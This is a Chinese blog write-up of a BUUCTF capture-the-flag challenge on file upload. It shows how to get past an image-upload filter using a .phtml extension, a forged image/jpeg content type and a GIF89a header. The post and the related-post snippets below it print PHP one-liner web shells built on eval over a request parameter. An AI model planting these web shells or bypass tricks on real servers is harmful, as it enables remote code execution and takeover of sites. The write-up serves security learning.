BUUCTF-Web:[极客大挑战 2019]Upload

已于 2022-05-29 22:41:00 修改
阅读量854 收藏 5
点赞数 1
分类专栏: BUUCTF 文章标签: php 安全 web安全
于 2022-05-29 22:39:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56161093/article/details/125037751
版权

题目

解题过程

1、上传文件


从网页上来看是上传一个图片文件,但我们不知道他是如何检查上传的文件,所以可以试一试上传各种文件。一般检查文件的地方有:后缀名、content-type、文件头的部分内容。
这里我们先上传一个php文件,不做任何修改。如下图:

结果如下:

2、修改文件后缀名和content-type

将文件名修改为shell.phtml,绕过常规php文件后缀检测
将文件类型修改为:image/jpeg
注意:phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析

修改后内容如下:

上传结果如下:

因为我的一句话木马存在?>,所以被过滤了,所以我们需要将一句话木马进行修改来绕过限制
修改前的一句话木马如下:

<?php @eval($_POST['1234'])?>

修改后的一句话木马如下:

GIF89a?
<script language="php">eval($_REQUEST[1234])</script>

重新上传,修改后的内容如下:

上传成功,结果如下:

3、蚁剑连接

使用蚁剑连接上传的一句话木马

连接成功后可以在根目录找到flag

flag文件内容如下:

所以这道题的flag如下:

flag{fef7bf6b-fd3d-4142-8d08-29181ee9525d}

总结

以上就是我对这道题的解法。因本人菜鸡一只,如果有什么不对的地方,实属正常。还请各位大佬予以指正,谢谢!

「已注销」
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mercado-c:极客大学正在进行的项目
04-09
这个项目似乎由极客大学(Geek University)发起并进行,目的是让学生或参与者实践编程技能,特别是C语言的运用。 在描述中,我们可以提取出以下几个关键知识点: 1. **用户界面与菜单**:应用程序需要向用户提供...
geek-festa-web-api-sample:极客节庆的样本Web API
03-10
极客节庆的样本Web API】是一个基于C#编程语言构建的应用程序,它展示了如何设计和实现一个功能丰富的Web API。Web API是应用程序接口的一种形式,允许不同系统之间通过HTTP协议交换数据,通常用于构建服务端应用...
极客挑战2019Upload解题
Bird&Bird
10-26 3737
1、打开BUUCTF在线评测,选择web---->【极客挑战2019Upload。 2、首先上一句话木马。 报错了,说明进行了前端过滤非图片格式文件。 3、 将文件后缀名改为.jpg后在上传。 报错,说明进行了后端过滤,文件内容不能包含'<?'。 4、修改文件内容,然后上传。 继续报错 应该是对图片头进行了校验,那添加图片头,然后上传。 终于上传成功了,但此时我们上传的是一个.jpg图片,利用不了。 5、通过bp抓包,并修改图片后...
buuctf-[ACTF2020 新生赛]Upload(小宇特详解)
小宇的web博客
01-15 2836
buuctf-[ACTF2020 新生赛]Upload(小宇特详解) 这里把鼠标放到小灯泡上,发现小灯泡亮了且有文件上传的地方。 这里先上传一个php文件来查看能否上传 这里只能上传指定类型的。查看源代码。 这里进行了前端验证。 这里尝试一下抓包,修改后缀进行上传。 这里写一个一句话木马。 GIF89a//在文件前加上GIF89a来绕过PHP getimagesize的检查,来绕过文件内容头校验 <script language="php">eval($_POST['shell']);&lt
[极客挑战 2019]Upload--BUUCTF
最新发布
XiaoYeZhu_1314的博客
04-24 503
添加头文件:GIF89a改文件格式为image/jpegcheck。
[极客挑战 2019]Upload
weixin_52116519的博客
04-14 507
1、上传合适的文件,但是png不行 2、上传一句话木马,但是过滤了<? 3、上传这个<script language=php>eval($_POST[1])</script>一句话木马,前几天刚遇到类似问题,好在还没忘记。 4、添加GIF89a 5、 6、 7、 8、 9、访问,getshell 10、flag 11、连蚁剑,看源码 <?php $file = $_FILES["file"]; // 允许上传的图片后缀 $allowedExts = array("ph
[极客挑战2019]upload
I_WORM的博客
02-20 486
这里进行了多次尝试,发现phpphp3、php5等都被过滤了,phtml可以通过,php空格也可以,php.也能通过;</script>替换了;测试后发现只有后缀为phtml的文件可以解析php内容,html、phpphp.都不能正常解析;犯蠢的点儿:利用html、php空格和php.不解析<script language="php">代码就盲目认为是代码格式的问题;导致后面脑子就崩了;看了3.php才发现Asp_tags是关闭的;文件路径是没有给的,直接尝试访问upload文件夹发现是存在的;
BUUCTFUpload [ACTF2020 新生赛]
金 帛的博客
04-19 727
BUUCTF的WP
course-java-2:极客大学家庭作业Java 2级
05-09
Java家庭作业2级(极客大学) 第1课。Java面向对象的编程 OOP原则,类,对象,接口,枚举,内部/嵌套/匿名/本地类。 第2课。例外 异常处理的概念,与传统错误处理机制的比较,try-catch-finally块,异常类型,Java...
thegeekdeveloper-portfolio:极客开发人员组合
05-13
极客开发人员组合 构建设置 # install dependencies $ npm install # serve with hot reload at localhost:3000 $ npm run dev # build for production and launch server $ npm run build $ npm start # generate ...
Certificate-Engine:极客之家的证书引擎
05-15
在“ cehg / client / web-app”文件夹中打开终端/ cmd 运行“ npm install”以安装所有依赖项。 运行“ npm start”以启动开发服务器。 请阅读以获取有关CEHG网络应用程序入门的详细信息安卓应用使用颤振贡献指南...
BUUCTF/Upload-Labs-Linux
weixin_44041994的博客
03-20 1270
strrchr()函数作用为查找字符串在另一字符串中最后一次出现的位置,并返回从该位置到字符串结尾的所有字符,本用来返回后缀名,如:webshell.php,则会返回.php,但是如果我们在.php后再加入一个 . ,则该函数只会返回 . ,可以轻松绕过检查。ps:只能是Windows系统,并且只能是php文件。文件的上传过程为:用户上传文件,服务器获取文件,然后保存临时文件,然后使用移动函数(比如php中的move_uploaded_file() ),才会将文件移动到站点的根目录下面。
BUUCTF-Web:[ACTF2020 新生赛]Upload
m0_56161093的博客
05-30 1091
题目 解题过程 1、上传文件 从网页上来看,可以上传文件,我们尝试上传一个PHP一句话木马。结果如下: 提示我们只能上传图片类型的文件,尝试用burpsuite抓包,发现同样有弹窗,但没有抓到数据。所以这里猜测这里是前端JS进行校验的 2、绕过前端校验 方法一 禁用一下 js 再提交,就可以绕过了 方法二 修改PHP后缀为图片的后缀然后上传,再重新抓包修改后缀 修改前: 修改后: 上传结果如下: 可以看到上传失败,应该是服务器端对上传的文件进行了校验。 3、绕过上传黑名单 常规PHP文件后缀
BUUCTF Web upload
H18779083518的博客
05-10 339
script language="php">eval($_REQUEST[1])</script>打开后即得flag:flag{d8c839e5-3aa7-40db-9899-858007fc3778}首先尝试一句话木马上传,尝试过多种绕过手段后发现仍然无法上传,于是我们怀疑是一句话木马被黑名单了。方法二:正常情况上传的文件都会存放在Upload,更可况题目就叫upload。方法一:看bp的回显(我没看见所以选择了方法二)成功上传一句话木马后我们尝试寻找木马的存放路径。找到路径后使用蚁剑连接,连接成功。
BUUCTF web 文件上传+文件包含篇
m0_55854679的博客
08-09 2419
文章目录[ACTF2020 新生赛]Include——文件包含 [ACTF2020 新生赛]Include——文件包含 1.打开题目链接,查看题目意思为文件包含 2. 获取到的url为 http://c605348f-44f9-4c25-b602-66c73ee07005.node3.buuoj.cn/?file=flag.php 是一个php文件,返回字符串如下:Can you find out the flag? 猜测读取原码:构造url: ?file=php://filter/read=conve
BUUCTF upload
wwwwyyyrre的博客
03-27 206
果然 用了js前端验证 关掉之后试着上传php php3 php5 phtml文件 发现phtml文件可以上传成功。这里之所以用phtml文件 是因为phtml文件可以被解析 图片马虽然有上传路径但是无法链接成功。发现不能是php文件 把文件后缀改成jpg形式 发现有后端过滤文件中不能包含<?这道题只要上传的不是jpg、png、gif结尾的图片都抓不了包 怀疑用了前端验证。上传php文件 发现不可以 并给显示 只可以上传jpg、png、gif结尾的图片。用蚁剑连接成功 在根目录找到flag。
CTF笔记:BUUCTF-[极客挑战2019]Upload
dqx1223的博客
07-09 957
ctf笔记
BUUCTF Web [极客挑战 2019]Upload & [ACTF2020 新生赛]Upload
网安小趴菜
08-31 580
BUUCTF Web [极客挑战 2019]Upload 和[ACTF2020 新生赛]Upload
[极客挑战 2019]Upload 1
m0_69856013的博客
10-15 910
第一次使用蚁剑,第一次做文件上传
buuctf web 极客挑战2019
08-24
嗨!对于BUUCTF Web极客挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计和网络协议等。参赛者需要通过解决各个题目来获取相应的flag,以证明自己的能力。如果你有具体的问题或需要更详细的信息,我会尽力帮助你。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值